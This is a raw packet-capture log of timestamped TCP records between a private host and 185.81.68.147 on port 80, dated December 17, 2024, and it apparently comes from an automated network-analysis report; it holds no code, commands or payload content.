                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.875247002 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.875925064 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.876053095 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.876266956 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.876914978 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.877001047 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.877845049 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.877886057 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.877923965 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.877991915 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.878803015 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.878973961 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.879051924 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.879749060 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.879854918 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.879919052 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.880728006 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.880907059 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.881212950 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.881625891 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.926048040 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.023883104 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.024015903 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.024128914 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.024296999 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.024441957 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.024663925 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.025240898 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.025388956 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.026050091 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.026184082 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.026297092 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.027151108 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.027259111 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.027270079 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.028039932 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.028115988 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.028186083 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.028320074 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.029010057 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.029186964 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.029347897 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.030000925 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.030112982 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.030193090 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.030942917 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.031050920 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.031215906 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.031876087 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.032067060 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.032819986 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.032887936 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.032979965 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.033823967 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.033946991 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.033951044 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.034251928 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.034775019 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.034888983 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.035037994 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.035661936 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.035816908 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.035897970 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.036624908 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.036722898 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.036825895 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.037570953 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.037678957 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.038007975 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.038579941 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.038742065 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.039478064 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.039568901 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.039671898 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.040443897 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.040512085 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.040700912 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.040791988 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.041394949 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.041534901 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.041856050 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.042371035 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.042408943 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.042480946 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.043288946 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.043451071 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.043993950 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.044392109 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.044615030 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.045053959 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.045212984 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.045340061 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.045536995 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.046159983 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.046267986 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.046463013 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.047094107 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.047127008 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.047334909 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.048064947 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.048160076 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.048253059 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.049011946 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.049127102 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.049304008 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.050000906 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.050213099 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.050363064 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.050971031 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.051024914 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.051276922 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.051870108 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.051997900 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.052824020 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.052946091 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.052951097 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.053271055 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.053783894 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.053910971 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.054240942 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.054724932 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.054819107 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.055336952 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.055778980 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.055895090 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.056153059 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.056754112 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.056862116 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.057064056 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.057590008 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.057709932 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.057881117 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.058542013 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.058664083 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.059500933 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.059595108 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.059767962 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.060323000 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.060451031 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.060496092 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.061180115 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.061408997 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.061543941 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.061693907 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.062530041 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.062541962 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.062748909 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.063337088 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.063546896 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.064416885 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.064421892 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.064446926 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.065259933 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.065376997 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.065959930 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.065959930 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.066210985 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.066322088 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.066425085 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.067120075 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.067238092 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.068108082 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.068206072 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.068561077 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.068561077 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.069052935 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.069242001 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.069475889 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.069972992 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.070137024 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.070229053 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.070895910 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.071082115 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.071235895 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.071871996 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.072029114 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.072182894 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.072851896 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.072938919 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.073064089 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.073797941 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.129178047 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.215842962 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.215950966 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.216041088 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.216289043 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.216423988 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.216655970 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.217255116 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.217417955 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.217529058 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.218183994 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.218281984 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.218369007 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.219203949 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.219290018 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.219346046 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.220082045 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.220196009 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.220232010 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.221131086 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.221195936 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.221240044 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.222001076 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.222162008 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.222244978 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.222960949 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.223087072 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.223185062 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.223922968 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.224015951 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.224281073 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.224848032 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.224980116 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.225367069 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.225792885 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.225925922 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.226047993 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.226748943 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.226844072 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.226943016 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.227705956 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.227891922 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.228005886 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.228678942 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.228792906 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.228899002 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.229600906 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.229723930 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.229957104 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.230600119 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.230736017 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.230808973 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.231533051 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.231641054 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.231894970 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.232474089 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.232573986 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.232980967 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.233418941 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.233525038 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.233577013 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.234381914 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.234489918 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.235194921 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.235373974 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.235502958 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.236048937 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.236277103 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.236408949 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.236475945 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.237282038 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.237359047 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.237406015 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.238217115 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.238320112 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.238471985 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.239131927 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.239252090 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.239348888 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.241930962 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.241998911 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.242012024 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.242054939 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.242089033 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.242108107 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.242120981 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.242136002 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.242165089 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.243009090 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.243144989 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.243356943 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.243916988 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.244049072 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.244178057 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.244859934 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.245001078 CET8049709185.81.68.147192.168.2.8
